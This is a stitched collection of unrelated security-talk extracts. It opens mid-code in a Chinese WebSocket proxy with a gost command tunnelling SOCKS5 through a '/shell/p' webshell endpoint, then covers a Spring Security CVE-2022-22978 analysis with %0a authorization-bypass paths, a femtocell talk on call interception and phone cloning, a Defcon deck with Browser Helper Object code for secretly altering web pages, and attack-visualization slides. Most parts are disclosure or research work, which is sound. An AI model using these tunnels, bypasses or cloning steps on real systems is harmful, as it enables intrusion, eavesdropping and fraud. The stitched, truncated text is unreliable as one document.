配好socks后就可以进⾏愉快的代理了:)                   ByteBuffer b = buffer.get(arr, 0, result);                   baos.write(arr, 0, result);                   readFromServer(scAttachment.channel, scAttachment.client);               }           }       } catch (Exception ignored) {       }   }   @Override   public void failed(Throwable t, WsProxy scAttachment) {       t.printStackTrace();   }   @Override   public void onMessage(ByteBuffer message) {       try {           message.clear();           i++;           process(message, session);       } catch (Exception ignored) {       }   } } 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 Plain Text 复制代码 ./gost-windows-amd64.exe -L "socks5://:1180" -F "ws://192.168.88.130:8083?path=/shell/p" 1 6
pdf
1 Spring Security CVE-OLOO-OOXVW漏洞分析 ⾸先查看官⽅公告 https://spring.io/blog/2022/05/15/cve-2022-22978-authorization-bypass-in- regexrequestmatcher 注意到和 RegexRequestMatcher 有关,在官⽅仓库找到了最近修改 和 RegexRequestMatcher 有关的代码。 https://github.com/spring-projects/spring- security/commit/472c25b5e8b7374ba7e1b194ea09f43601f6f1c2 ⼀、漏洞简单分析 2 从测试⽤例⾥可以看到就是⽤\n、\r绕过正则判断,⽐如开发做了如下配置 意味着除了/login以为的任何路径都需要授权才能访问。此时如果我们输⼊ /xxx/aaa%0ag 配置的正 则会匹配不上我们访问的路径,就绕过了权限校验。 Java 复制代码 @Override protected void configure(HttpSecurity http) throws Exception {    http.csrf().disable();    http.authorizeRequests()       .requestMatchers(new RegexRequestMatcher(".*",null)).authenticated()//配置拦截所有请求       .antMatchers("/login").permitAll();//配置/login不拦截   } 1 2 3 4 5 6 7 3 第⼀眼看这个洞肯定想到 /%0a/../admin 这样绕然后访问admin,⾸先不管 Spring Security 是 去匹配路径规范化以后的路径还是原始的, Spring Security 在此之前还有⼀个 Firewall 就会 拦截这种请求。然后想着要是不能把这个%0a给弄掉怎么去访问到路由呢不可能有谁真的写⼀个带回⻋ 换⾏的路由吧。 基于上⾯的思考⼤概想到两种可⽤场景。 有的路由会像下⾯这样配置 我们配置了上⾯的权限校验以后正常访问 /test/xxx 是403 访问 /test/xxxx%0a 成功绕过权限校验 ⼆、实际利⽤场景 场景⼀ Java 复制代码    @ResponseBody        @RequestMapping("/test/*")    public String test(){        return "test";   } 1 2 3 4 5 4 使⽤了路径参数代码如下 /test1/xxxx 403 /test1/xxxx%0a 200 场景⼆ Java 复制代码    @ResponseBody    @RequestMapping("/test1/{path}")    public String test1(@PathVariable String path){        return "test1"+path;   } 1 2 3 4 5 5
pdf
Traffic Interception & Remote Mobile Phone Cloning with a Compromised CDMA Femtocell Doug DePerry Tom Ritter Andrew Rahimi iSEC Partners • The specific method used to access the device that makes the demonstration possible has been resolved by Verizon Wireless through a security patch. • The Network Extenders being used to conduct the demonstration do not have the security patch installed. • Verizon Wireless gave iSEC permission to use the network extenders to conduct the demonstration in consideration of iSEC bringing the issue to the attention of Verizon Wireless. 2 • This is not like joining an open WiFi network • Your phone associates automatically with no* indication • You might be on ours right now.  • We don’t hack phones… at least not today No User Interaction 3 Full Disclosure • Disclosed vulnerabilities to the carrier early December • They worked extremely hard, over Christmas, to prepare a patch • All vulnerabilities disclosed in this presentation have been patched • We do have architectural concerns around femtocells • Concerns shared by… 4 Prior Art • BH 2011 “Femtocells: a Poisonous Needle in the Operator's Hay Stack” • SFR Femtocell (2nd biggest operator in France) • THC: Vodafone (2010/2011) • RSAXVC & Doug Kelly (Bsides KC 2011) • Rooting • Cable construction • “Do It Yourself Cellular IDS” • Black Hat 2013 5 • North American Carrier • 3G • CDMA • Customers affected • Roughly 1/3 of the population of the US • Phone Calls & SMS • MMS, Data Man-In-The-Middling, SSL Stripping • Cloning Our Focus 6 Rooting Exploring • Filesystem • Traffic Exploiting • Voice, SMS, Data Cloning Fixing Agenda 7 General Architecture We Are Here!  8 Rooting the Femtocell(s) SCS-26UC4 (Older) SCS-2U01 (Newer) 9 Rooting the Femtocell(s) SCS-26UC4 (Older) SCS-2U01 (Newer) Bonus! 10 • Faraday FA626TE ARM v5TE processor • on Samsung UCMB board • OneNAND flash memory • Lattice FPGA • Presumably for DSP • GPS antenna • CDMA antenna • 2G/3G • Ethernet • HDMI Port SCS-2U01 Hardware 11 • HDMI port Console Port 12 • USB FTDI + HDMI = Custom Cable 13 • Approximately 40’ • Environmental factors • Adjust signal strength • Amplify Wireless Signal Range 14 • SCS-26UC4 • 57600 8 N 1 • Uboot delay: “Press any key to interrupt boot” • Root shell • Run /etc/init.d/rc 5 • Root on fully functional device • SCS-2U01 • 115200 8 N 1 • Magic sysreq + i • Root login • Run /etc/init.d/rc 5 • Root on fully functional device Console Access! 15 These mechanisms to obtain root no longer work (But may be useful on other embedded devices) Console Access: Patched 16 Exploring the Femtocell 17 • MontaVista Linux 5, 2.6.18 • Custom kernel, drivers, software • /mnt/onand • Custom application binaries • uimhx, cmbx, cdhx, agent, vpn • Keys, passwords, etc • /etc/shadow • /app/vpn/quicksec.xml Filesystem 18 • This terminal console sucks • Can’t really do anything • Let’s patch • No easy way to edit files • ugh, sed • SSHD • PKI-only, no RootLogin • Edit SSHD.conf • Flush iptables I am root, but… 19 • Filesystem is pulled from firmware every single time • Any changes disappear on reboot • Have to edit firmware and reflash? • Until we noticed… • Persistent filesystem location • /mnt/onand Be Persistent 20 • Read every single startup script until… if [ -f /mnt/onand/.ubirc ]; then echo 'DEBUG MODE STARTUP is TARTTING....’ . /mnt/onand/.ubirc Be Persistent That’s the part of the filesystem we can persist in! 21 • .ubirc • Presence of this file == debug mode • We use it to run scripts • Patch sshd • Allow interactive root login • Flush iptables • exec /bin/bash Be Persistent 22 • We’re persistent • Call me Eve • Let’s go find the packets! • QuickSec VPN client • Packaged as a Netfilter kernel module • Literally steals packets out of Netfilters and handles them itself… • Packets don’t show up in normal capture tools like tcpdump • Not Open Source Let’s go after the data 23 It’s Just Engineering 24 • Custom kernel module • Priority is tricky • Incoming/Outgoing • Must be above & below quicksec to get the plaintext before encryption and after decryption • Custom Userland app • Display data in real-time • Log to pcap • Cross-compiling is fun* • *fun like a hernia I want packets! 25 Voice, Texts, and Data 26 • Its mostly UDP, lots and lots of UDP • Strange Ports • This is hard. Voice: Lots ‘o packets 27 Voice: Force Decode as RTP 28 RFC 3558: Value Rate Total data frame size --------------------------------------------------------- 0 Blank 0 (0 bit) 1 1/8 2 (16 bits) 2 1/4 5 (40 bits; not valid for EVRC) 3 1/2 10 (80 bits) 4 1 22 (171 bits; 5 padded at end w/ zeros) 5 Erasure 0 (SHOULD NOT be transmitted by sender) Voice – Codec? 29 Voice – Codec? No Answers! 30 Voice – Codec? 31 Voice! 32 http://www.youtube.com/watch?v=3FyNB4QmY1Q • These specs suck • But we figured it out • 7-bit Words, ugh SMS 33 SMS 34 SMS http://www.youtube.com/watch?v=R-4fkJiVeE4 35 • Plaintext! Praise the Lord: beautiful, decoded, plaintext • Easiest thing to do with data: View It. Data 36 37 MMS http://www.youtube.com/watch?v=uuwsMsvGAYo • Plaintext! Praise the Lord: beautiful, decoded, plaintext • Easiest thing to do with data: View It. • Second easiest thing to do with data: Drop It. Data 38 • And when you Denial of Service some data services, they fail over insecurely… iMessage 39 • Back to the Data. It is plaintext. • However: Lots of encapsulation • If we’re lucky: IP, GRE, PPP, HDLC, IP… • If we’re not: IP, GRE, PPP, HDLC & then IP segmented across GRE packets Data 40 Data Traffic 41 • Goal: Edit a Webpage, as simply as possible • (Change HTTPS Form Action - > HTTP) • Going to require editing the inner TCP checksum • Which requires decoding and re-encoding • And editing the PPP checksum • And hopefully doesn’t change the size • TCP Checksum is at the beginning (GRE frame N) • PPP Checksum is at the end (GRE frame N+3? 4?) • Oh, and the frames may be out of order Data Middling 42 • Try 1: • Do it inline, in the kernel • Nope: Carrier applies transparent compression to all traffic on port 80 • Can’t collect packets to decompress, edit, and recompress, can’t only edit one packet at a time • Try 2: • Change the request to HTTP 1.0 (No Compression) • Nope: Carrier Ignores it Data Middling 43 • Try 3: • DNS Hijack, send everyone to our server • Nope: Carrier does transparent proxying on port 80, then does own lookup based on Host header • Try 4: • DNS Hijack AND rewrite all connections to port 80 on our IP to port 81, and back again • Nope: Corner Cases. If they happen 2% of the time, on a normal webpage, it’s dozens of packets. Data Middling 44 • Try 5: • DNS Hijack, rewrite all connections to port 80 on our IP to port 81, and back again, AND Redirect people to 8080 • Success! • The corner cases don’t occur on the small 301 redirect • We can proxy the real webpage to users, ferrying their cookies and form posts, and: • Strip SSL • Rewrite URLs to port 8080 Data Middling 45 http://www.youtube.com/watch?v=2xjhtDobO8c Data Middling Video 46 Miniature Cell Towers • Eavesdropping is cool and everything but… • Impersonation is even cooler. 47 Cloning 48 CDMA Terminology • No SIM Cards needed here • Unlike the IMSI, the MIN is just a 10 digit phone number, sometimes the same as your actual phone number GSM CDMA Device ID IMEI ESN (Now MEID) Subscriber ID IMSI MIN User Phone # MSISDN MDN 49 • ESN (Electronic Serial Number) • CDMA-specific ID number: “11 EE 4B 55” • MEID (Mobile Equipment Identifier) • ESNs ran out! MEID is successor • Pseudo ESN used for backwards compatibility with handsets using MEIDs: “80 11 EE 4B” • (Phones often ALSO have an IMEI for global or 4G) CDMA Terminology 50 • Every time you make a call, MIN and MEID or ESN sent unencrypted to the tower to identify you • That used to be it, and cloning was rampant Cloning basics – Real Towers MIN, MEID/ESN 51 • CAVE (Cellular Authentication and Voice Encryption) • Every phone has a secret A-Key, which generates two derivative keys used to authenticate every call and message, as well as encrypt voice traffic over the air • The A-Key is never shared over the network, but the derivative keys are used for every call Enter the CAVE 52 • The femtocell acts just like any other tower, except it doesn’t actually require the MEID • ESN is used with older devices, and pESN is used instead of MEID on newer devices Connecting to a Femtocell (p)ESN, MIN 53 • The femtocell does not use MEIDs for authentication at all, only the (p)ESN and MIN • And most importantly, the femtocell didn’t require CAVE! • This means that a “classic” clone with just the (p)ESN and MIN would work - as long as the attacker’s clone is connected to a femtocell • We just need the (p)ESN and MIN of our victim Remember Your Failure At The CAVE… (p)ESN, MIN 54 • (p)ESN/MIN values are passed through the femtocell in a registration packet whenever ANY phone comes within range • This allows cloning without physical access to phone The Perfect Clone 55 The Perfect Clone Step 1: Victim phone falls in range of rooted femtocell with sniffer Step 2: MIN and ESN are collected and cloned to a target device 0x80123456 (201) 555 - 1234 Step 3: Target device is associated with a stock femtocell Step 4: Clone attained; calls and SMS can be made on behalf of original phone 56 Cloning Implications • Cloning can be flakey • Voice • The elusive 2.5-way call • SMS • Data • Not yet…. • Helpful definitions for our discussion: • Victim phone – the phone of a legitimate subscriber whose keys have been captured by a rogue femtocell • Target phone – the phone of an attacker that has been modified (cloned) to the legitimate victim phone 57 Cloning Scenario 0 When the VICTIM phone is turned off or jammed • Everything works • Incoming Call • Outgoing Call • SMS 58 Cloning Scenario 1 When both the TARGET and VICTIM phones are associated with the femtocell. • Outgoing Call • Forced drop • SMS • Incoming 59 Cloning Scenario 1 When both the TARGET and VICTIM phones are associated with the femtocell. 60 • Incoming Call • Only one phone rings • Situation normal • Both phones ring • The race is on • “Two-and-a-half”-way call Third Party Caller’s Voice Target’s Voice Victim’s Voice Passive Association Carrier Cloning Scenario 2 When only the TARGET phone is associated to the femtocell and the VICTIM phone is on an actual Verizon tower 61 • Outgoing Call • TARGET call is dropped • Two for one! • Incoming Call and SMS • Most recent carrier contact Carrier Cloning Data • Much more difficult • Need more keys • Valid NAI • HA • AAA 62 63 Cloning Video http://www.youtube.com/watch?v=Ydo19YOzpzU Cloning: Patched The requirement for CAVE Authentication to be enabled takes place on the Carrier Network (not the femtocell). Accordingly, it was patched without requiring any software updates to the femtocell. 64 Femtocells are a Bad Idea 65 Major US Carrier Comparison Carrier Technology Femtocell? Verizon CDMA Yes Sprint CDMA Yes AT&T GSM Yes T-Mobile GSM No 66 • Harden the femtocell hardware and software • That might help except… Short Term Mitigations 67 “If an attacker has physical control over your computer… it’s not your computer anymore.” Root is always possible 68 • We got in through a serial port • JTAG / UART ports? • Reflash firmware? • Glitching Attacks? Root is always possible 69 Require phone registration • Capability currently exists Short Term Mitigations 70 Femtocell Handset Registration Vendor Tech Femtocell Requires Registration Verizon CDMA Yes No Optional per Femtocell Sprint CDMA Yes No Optional per Femtocell AT&T GSM Yes Yes! T-Mobile GSM No! Wi-Fi Calling N/A 71 Require phone registration • Capability currently exists • Protects against untargeted dragnets • Does not protect against isolation attacks Short Term Mitigations 72 • Get rid of ‘em • WiFi Calling • IPSec or SSL Tunnel • End-to-End encryption • OSTel & CSipSimple/Groundwire • RedPhone • ZRTP Long Term Mitigations 73 Fixes & Bandaids 74 • Short Term • Harden femtocell • Require registration • Long Term • No femtocells • Move to WiFi Calling • End-to-end Encryption Mitigation Summary 75 • How do I know if I’m connected to a femtocell? • Android - some phones display an icon when connected to a femtocell • Phones that Verizon modified • Not Stock Android, Not Third Party ROMs • iPhone – No visual indicator • All - Short beep at beginning of phone call (easy to miss) • But somewhere, there’s code written to detect them What Can I Do? 76 • Detects femtocells and puts you in airplane mode • http://github.com/isecp artners/femtocatcher • Thanks immensely to Mira Thambireddy 77 Announcing FemtoCatcher • End-To-End Encryption • Voice • RedPhone • OSTel • SMS / Chat • TextSecure • Gibberbot • Silent Circle • Wickr • Browsing • VPN • Tor (Android: Orbot+Orweb iOS:Onion Browser) What Else Can I Do? 78 Future Work 79 • Custom Protocols • Heavily Proxied • Forced gzip • Chunked Encoding • SSL Middling • Advertised… • …or not (Nokia) WAP (Wireless Application Protocol) 80 WAP 81 Fuzzaaaaaaaaaaaaaaaaaing • What happens when you fuzz the baseband? 82 Internal Femtocell Network • Femtocell -> Femtocell (rsaxvc/BH2011) • Femtocell -> Internal Carrier Network (BH2011) 83 • Doug DePerry • Senior Security Engineer at iSEC Partners • @dugdep • doug@isecpartners.com • Tom Ritter • Principal Security Engineer at iSEC Partners • @TomRittervg • tritter@isecpartners.com • Thanks to • RSAXVC & Doug Kelly • Andrew Rahimi, Davis Gallinghouse, Tim Newsham • These guys did much of the hard work • Mira, Michael, Pratik, Peter Oehlert, Joel Wallenstrom, and really all of iSEC Thank You & Questions? 84
pdf
(i) to hold the Disclosing Party’s Proprietary Information in confidence and to take reasonable precautions to protect such Proprietary Information (including, without limitation, all precautions the Receiving Party employs with respect to its confidential materials), (ii) not to divulge any such Proprietary Information or any information derived there from to any third person, (iii) not to make any use whatsoever at any time of such Proprietary Information except to evaluate internally its relationship with the Disclosing Party (iv) not to copy or reverse engineer any such Proprietary Information and not to export or reexport (within the meaning of U.S. or other export control laws or regulations) any such Proprietary Information or product thereof. This document is solely for the presentation of Twingo Systems. No part of it may be circulated, quoted, or reproduced for distribution without prior written approval from Twingo Systems. By reading this document, the Receiving Party agrees: Hack any website Defcon 11 – 2003 Edition - Alexis Park, Las Vegas, USA Grégoire Gentil CEO and CTO of Twingo Systems August 2, 2003 STRICTLY CONFIDENTIAL 2 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 3 (c) 2003 Twingo Systems, Confidential • You can either attack the bank… WHAT CAN YOU DO WHEN YOU WANT TO STEAL MONEY? • But be careful, security can be tough • Or you can attack all the customers of the bank 4 (c) 2003 Twingo Systems, Confidential WHAT CAN YOU DO WHEN YOU WANT TO HACK A WEBSITE? • You can either attack the server… • But be careful, security can be tough Firewall, intrusion detection, anti-virus, … • This is what I will teach you today • Or you can attack all the clients 5 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 6 (c) 2003 Twingo Systems, Confidential •Demo 1: Dynamic modification of the content of a webpage  Modify the homepage of a media website •Demo 2: Dynamic modification of the javascript of a webpage  Modify the features of the list view of a webmail DEMOS 7 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 8 (c) 2003 Twingo Systems, Confidential • Requires Internet explorer 4.0 and Windows 95 or later  Google Zeitgeist (http://www.google.com/press/zeitgeist.html) shows that more than 90% of the Google requests come from Windows – Internet Explorer • Requires DLL registration  An executable must be run once with “Power user” privileges  Many privilege escalation and code execution from a webpage without user intervention have been discovered • As you will see through this presentation, the attack is extremely generic and can lead to a lot of malicious scenarii. SCOPE OF THE SECURITY VULNERABILITY 9 (c) 2003 Twingo Systems, Confidential ADVANTAGES OF THE ATTACK • No modification on the targeted server is required • The attack uses a feature developped by Internet Explorer!!!  Microsoft provides and supports all the required tools • The installed DLL cannot be detected by anti-virus. This is a standard DLL with no specific signature or whatsoever • You can “personalize” the attack for all the clients • You can attack only one client 10 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 11 (c) 2003 Twingo Systems, Confidential • Implemented as COM in-process DLL and loaded by Internet Explorer. • The browser initializes the object and asks it for a certain interface. If that interface is found, Internet Explorer uses the methods provided to pass its IUnknown pointer down to the helper object • Implemented also in Explorer • See Dino Esposito article “Browser Helper Objects: The Browser the Way You Want It” in MSDN INTRODUCING BROWSER HELPER OBJECTS 12 (c) 2003 Twingo Systems, Confidential • The IObjectWithSite Interface: HRESULT SetSite( IUnknown* pUnkSite )  Receives the IUnknown pointer of the browser. The typical implementation will simply store such a pointer for further use HRESULT SetSite( IUnknown* pUnkSite ) { if ( pUnkSite != NULL ) { m_spWebBrowser2 = pUnkSite; if ( m_spWebBrowser2 ) { // Connect to the browser in order to handle events if ( ! ManageConnection( Advise ) ) MessageBox( NULL, "Error", "Error", MB_ICONERROR ); } } return S_OK; } ACCESSING THE INTERFACE OF THE BROWSER 13 (c) 2003 Twingo Systems, Confidential • The IConnectionPoint interface: HRESULT Connect( void )  To intercept the events fired by the browser, the BHO needs to connect to it via an IConnectionPoint interface and pass the IDispatch table of the functions that will handle the various events HRESULT Connect( void ) { HRESULT hr; CComPtr<IConnectionPoint> spCP; // Receives the connection point for WebBrowser events hr = m_spCPC->FindConnectionPoint( DIID_DWebBrowserEvents2, &spCP ); if ( FAILED( hr ) ) return hr; // Pass our event handlers to the container. Each time an event occurs // the container will invoke the functions of the IDispatch interface we implemented hr = spCP->Advise( reinterpret_cast<IDispatch*>(this), &m_dwCookie ); return hr; } GETTING THE BROWSER EVENTS 14 (c) 2003 Twingo Systems, Confidential STDMETHODIMP Invoke( DISPID dispidMember, REFIID riid, LCID lcid, WORD wFlags, DISPPARAMS* pDispParams, VARIANT* pvarResult, EXCEPINFO* pExcepInfo, UINT* puArgErr ) { CComPtr<IDispatch> spDisp; if ( dispidMember == DISPID_DOCUMENTCOMPLETE ) { m_spWebBrowser2 = pDispParams->rgvarg[1].pdispVal; CComPtr<IDispatch> pDisp; HRESULT hr = m_spWebBrowser2->get_Document( &pDisp ); if ( FAILED( hr ) ) break; CComQIPtr<IHTMLDocument2, &IID_IHTMLDocument2> spHTML; spHTML = pDisp; if ( spHTML ) { // Get the BODY object CComPtr<IHTMLElement> m_pBody; hr = spHTML->get_body( &m_pBody ); // Get the HTML text BSTR bstrHTMLText; hr = m_pBody->get_outerHTML( &bstrHTMLText ); // Get the URL CComBSTR url; m_spWebBrowser2->get_LocationURL( &url ); } } return S_OK; } ACCESSING THE DOCUMENT OBJECT 15 (c) 2003 Twingo Systems, Confidential • Register the DLL (regsvr32.exe myBHO.dll for instance) and create a key in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Explorer\Browser Helper Objects with the GUID of the component  The next instance of Internet Explorer will automatically load the BHO REGISTRING AND INSTALLING THE COMPONENT 16 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 17 (c) 2003 Twingo Systems, Confidential SOME POSSIBLE DEFENSES • Disable all or selected BHOs installed on the client  Simply Enumerate the BHOs from the registry and analyze the DLL information (see code on the DefCon CD) HKEY hkey; TCHAR szPath = “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects”; If ( RegOpenKey( HKEY_LOCAL_MACHINE, szPath, &hkey ) == ERROR_SUCCESS ) { TCHAR szGUID[255]; LONG ret = RegEnumKey( HKEY_LOCAL_MACHINE, 0, szGUID, 255 ); Int i = 0; while ( ( ret != ERROR_NO_MORE_ITEMS ) && ( ret == ERROR_SUCCESS ) ) { // You have the BHO GUID in szGUID ret = RegEnumKey ( HKEY_LOCAL_MACHINE, i, szGUID, 255 ); i++; } } • Main drawback: Pretty painful as BHOs can be sometimes useful  Acrobat plug-in is a BHO, Google toolbar uses BHO, … 18 (c) 2003 Twingo Systems, Confidential SOME POSSIBLE OTHER DEFENSES • Microsoft could improve BHO support in coming releases of Internet Explorer  Create a tag <disableBHO> to disable all BHOs for a given web page  Implement an authentication system to disable only non approved BHOs (implementation of a tag <disableNonApprovedBHO>) 19 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 20 (c) 2003 Twingo Systems, Confidential • Attack can be selective, personalized  The malicious can connect to an external website and download specific information • You should not trust what you see (especially if this is not your computer) • Use BHOWatcher to regurarly check the BHO installed on your computer CONCLUSION 21 (c) 2003 Twingo Systems, Confidential • Main contact: Gregoire Gentil CEO and CTO of Twingo Systems gregoire@twingosystems.com • Company: Twingo Systems, Inc. Provides security tool to secure the untrusted computer CONTACT INFORMATION 22 (c) 2003 Twingo Systems, Confidential AGENDA • Overview of the attack • Demos • General analysis • Technical analysis • How to defend? • Conclusion • Questions and Answers 23 (c) 2003 Twingo Systems, Confidential • If you have any question, it is the moment to ask… QUESTIONS AND ANSWERS
pdf
Network Attack Visualization Greg Conti www.cc.gatech.edu/~conti Disclaimer The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. image: http://www.leavenworth.army.mil/usdb/standard%20products/vtdefault.htm information visualization is the use of interactive, sensory representations, typically visual, of abstract data to reinforce cognition. http://en.wikipedia.org/wiki/Information_visualization An Art Survey… http://www.artinvest2000.com/leonardo_gioconda.htm http://www.geocities.com/h2lee/ascii/monalisa.html http://www.muppetlabs.com/~breadbox/bf/ http://www.clifford.at/cfun/progex/ A B C • Helps find patterns • Helps reduce search space • Aids efficient monitoring • Enables interaction (what if) • Help prevent overwhelming the user Why InfoVis? So What? • Go Beyond the Algorithm • Help with detecting and understand some 0day attacks • Make CTF and Root Wars a Spectator Sport • Help find insider threats • Stealth might not be so stealthy • Help visually fingerprint attacks/tools What tasks do you need help with? TCP Dump Tcpdump image: http://www.bgnett.no/~giva/pcap/tcpdump.png TCPDump can be found at http://www.tcpdump.org/ Ethereal image: http://www.linux- france.org/prj/edu/archinet/AMSI/index/images/ethereal.gif Ethereal by Gerald Combs can be found at http://www.ethereal.com/ EtherApe image: http://www.solaris4you.dk/sniffersSS.html Etherape by Juan Toledo can be found at http://etherape.sourceforge.net/ Ethereal EtherApe Packet Capture Visualizations 3D TraceRoute 3D TraceRoute Developer: http://www.hlembke.de/prod/3dtraceroute/ XTraceRoute Developer: http://www.dtek.chalmers.se/~d3august/xt/ Xtraceroute basic traceroute/tracert traceroute Visualizations Intrusion Detection System Types • Host-based intrusion-detection is the art of detecting malicious activity within a single computer by using – host log information – system activity – virus scanners • A Network intrusion detection system is a system that tries to detect malicious activity such as denial of service attacks, port-scans or other attempts to hack into computers by reading all the incoming packets and trying to find suspicious patterns. http://en2.wikipedia.org/wiki/Host-based_intrusion-detection_system http://en2.wikipedia.org/wiki/Network_intrusion_detection_system Ethernet Packet Capture Parse Process Plot tcpdump (pcap, snort) Perl Perl xmgrace (gnuplot) tcpdump capture files winpcap VB VB VB System Architecture Creativity Information Visualization Mantra Overview First, Zoom & Filter, Details on Demand - Ben Shneiderman http://www.cs.umd.edu/~ben/ Overview First… Zoom and Filter… Details on Demand… Representative Current Research SequoiaView http://www.win.tue.nl/sequoiaview/ Demo Observing Intruder Behavior Dr. Rob Erbacher – Visual Summarizing and Analysis Techniques for Intrusion Data – Multi-Dimensional Data Visualization – A Component-Based Event- Driven Interactive Visualization Software Architecture http://otherland.cs.usu.edu/~erbacher/ http://otherland.cs.usu.edu/~erbacher/ Demo Operating System Fingerprinting Dr. David Marchette – Passive Fingerprinting – Statistics for intrusion detection http://www.mts.jhu.edu/~marchette/ Soon Tee Teoh Visualizing Internet Routing Data http://graphics.cs.ucdavis.edu/~steoh/ See also treemap basic research: http://www.cs.umd.edu/hcil/treemap-history/index.shtml Demo Worm Propagation • CAIDA • Young Hyun • David Moore • Colleen Shannon • Bradley Huffaker http://www.caida.org/tools/visualization/walrus/examples/codered/ Jukka Juslin http://www.cs.hut.fi/~jtjuslin/ Intrusion Detection and Visualization Using Perl 3D plot of: •Time •SDP (Source-Destination-Port) •Number of Packets Data stored in Perl hashes Output piped to GNUplot TCP/IP Sequence Number Generation Initial paper - http://razor.bindview.com/publish/papers/tcpseq/print.html Follow-up paper - http://lcamtuf.coredump.cx/newtcp/ Linux 2.2 TCP/IP sequence numbers are not as good as they might be, but are certainly adequate, and attack feasibility is very low. Linux 2.2 TCP/IP sequence numbers are not as good as they might be, but are certainly adequate, and attack feasibility is very low. Michal Zalewski x[n] = s[n-2] - s[n-3] y[n] = s[n-1] - s[n-2] z[n] = s[n] - s [n-1] High Speed Data Flow Visualization Therminator technology watches the data stream and illustrates categories of data as colored bars that are proportional in height to the quantity of data at a given time. The process is repeated to form a stacked bar graph that moves across a computer screen to show current and past data traffic composition. http://www.fcw.com/fcw/articles/2002/1209/web-nsa-12-13-02.asp Haptic and Visual Intrustion Detection NIVA System • Craig Scott • Kofi Nyarko • Tanya Capers • Jumoke Ladeji-Osias http://portal.acm.org/citation.cfm?id=952873&dl=ACM&coll=GUIDE Team Name Team Score Hacking Rank Count of services Entire slide from: www.toorcon.org/slides/rootfu-toorcon.ppt Atlas of Cyber Space http://www.cybergeography.org/atlas/atlas.html Honeynets John Levine • The Use of Honeynets to Detect Exploited Systems Across Large Enterprise Networks • Interesting look at detecting zero-day attacks http://users.ece.gatech.edu/~owen/Research/Conference%20Publications/honeynet_IAW2003.pdf 0 200 400 600 800 1000 1200 Jul_31 Aug_06 Aug_29 Aug_21 Sep_09 Sep_17 Sep_24 Oct_12 Oct_04 Oct_28 Oct_20 Nov_08 Nov_09 Nov_19 Nov_21 Nov_29 Dec_05 Dec_13 Dec_21 Dec_29 Jan_06 Jan_14 Jan_22 Jan_28 Feb_05 Feb_13 Feb_20 Feb_27 Mar_07 Mar_13 Mar_19 Mar_27 Apr_04 Apr_12 Apr_20 Jun_10 Sep_10 0 500 1000 1500 2000 2500 3000 3500 5/20/2003 5/27/2003 6/3/2003 6/10/2003 6/17/2003 6/24/2003 7/1/2003 7/8/2003 7/15/2003 7/22/2003 7/29/2003 8/5/2003 8/12/2003 8/19/2003 8/26/2003 9/2/2003 9/9/2003 Port 135 MS BLASTER scans Date Public: 7/16/03 Date Attack: 8/11/03 Georgia Tech Honeynett Source: John Levine, Georgia Tech 0 500 1000 1500 2000 2500 3000 3500 5/20/2003 5/27/2003 6/3/2003 6/10/2003 6/17/2003 6/24/2003 7/1/2003 7/8/2003 7/15/2003 7/22/2003 7/29/2003 8/5/2003 8/12/2003 8/19/2003 8/26/2003 9/2/2003 9/9/2003 Hot Research Areas… • visualizing vulnerabilities • visualizing IDS alarms (NIDS/HIDS) • visualizing worm/virus propagation • visualizing routing anamolies • visualizing large volume computer network logs • visual correlations of security events • visualizing network traffic for security • visualizing attacks in near-real-time • security visualization at line speeds • dynamic attack tree creation (graphic) • forensic visualization http://www.cs.fit.edu/~pkc/vizdmsec04/ More Hot Research Areas… • feature selection and construction • incremental/online learning • noise in the data • skewed data distribution • distributed mining • correlating multiple models • efficient processing of large amounts of data • correlating alerts • signature and anomaly detection • forensic analysis http://www.cs.fit.edu/~pkc/vizdmsec04/ One Approach… • Look at TCP/IP Protocol Stack Data (particularly header information) • Find interesting visualizations • Throw some interesting traffic at them • See what they can detect • Refine Information Available On and Off the Wire • Levels of analysis • External data – Time – Size – Protocol compliance – Real vs. Actual Values • Matrices of options • Header slides http://ai3.asti.dost.gov.ph/sat/levels.jpg Ethernet: http://www.itec.suny.edu/scsys/vms/OVMSDOC073/V73/6136/ZK-3743A.gif Link Layer (Ethernet) Network Layer (IP) Examining Available Data… Transport Layer (TCP) Transport Layer (UDP) IP: http://www.ietf.org/rfc/rfc0791.txt TCP: http://www.ietf.org/rfc/rfc793.txt UDP: http://www.ietf.org/rfc/rfc0768.txt Grace “Grace is a WYSIWYG 2D plotting tool for the X Window System and M*tif. Grace runs on practically any version of Unix-like OS. As well, it has been successfully ported to VMS, OS/2, and Win9*/NT/2000/XP” http://plasma-gate.weizmann.ac.il/Grace/ Parallel Plot Target Machine’s Ports Remote Machine’s Ports Results Example 1 - Baseline with Normal Traffic Example 2 - Port Scan Example 3 - Port Scan “Fingerprinting” Example 4 - Vulnerability Scanner Example 5 - Wargame Example 1: Baseline External Port Internal Port External IP Internal IP Example 2 - PortScan Defender Attacker nmap 3.00 default (RH 8.0) nmap 3.00 udp scan (RH 8.0) Superscan 3.0 Nmap Win 1.3.1 Example 3- PortScan “Fingerprinting” nmap 3 (RH8) NMapWin 3 (XP) SuperScan 3.0 (XP) SuperScan 4.0 (XP) nmap 3 UDP (RH8) nmap 3.5 (XP) scanline 1.01 (XP) nikto 1.32 (XP) Demo Exploring nmap 3.0 in depth (port to IP to IP to port) default (root) stealth FIN (-sF) NULL (-sN) SYN (-sS -O) stealth SYN (-sS) CONNECT (-sT) UDP (-sU) XMAS (-sX) nmap within Nessus (port to IP to IP to port) CONNECT (-sT) UDP (-sU) Nessus 2.0.10 Codebase Evolution SuperScan 